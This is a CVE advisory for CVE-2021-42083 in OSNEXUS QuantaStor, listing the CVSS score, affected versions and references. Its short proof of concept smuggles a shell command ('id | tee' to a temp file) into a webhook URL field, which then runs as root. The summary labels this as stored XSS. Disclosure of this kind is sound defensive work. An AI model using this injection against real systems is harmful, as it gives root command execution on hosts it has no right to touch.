CVE-2021-42083
8.7
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Summary
An authenticated attacker is able to create alerts that trigger a stored XSS attack.
POC
go to the alert manager
open the ITSM tab
add a webhook with the URL/service token value
' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters)
click add
click apply
create a test alert
The test alert will run the command
“id | tee /tmp/ttttttddddssss” as root.
- after the test alert inspect
/tmp/ttttttddddssss it'll contain the ids of the root user.
Affected Software
| Vendor | Product | Version Range | Status |
|---|---|---|---|
| OSNEXUS | QuantaStor | 0 < 6.0.0.355 | affected |
Weaknesses
- CWE-79: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
ADP Enrichment
CVE Program Container
Additional References
- https://www.wbsec.nl/osnexus
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://csirt.divd.nl/CVE-2021-42083
References
- https://www.wbsec.nl/osnexus
- https://csirt.divd.nl/DIVD-2021-00020/
- https://www.osnexus.com/products/software-defined-storage
- https://csirt.divd.nl/CVE-2021-42083
Feedback
Was this page helpful?
Glad to hear it! Please tell us how we can improve.
Sorry to hear that. Please tell us how we can improve.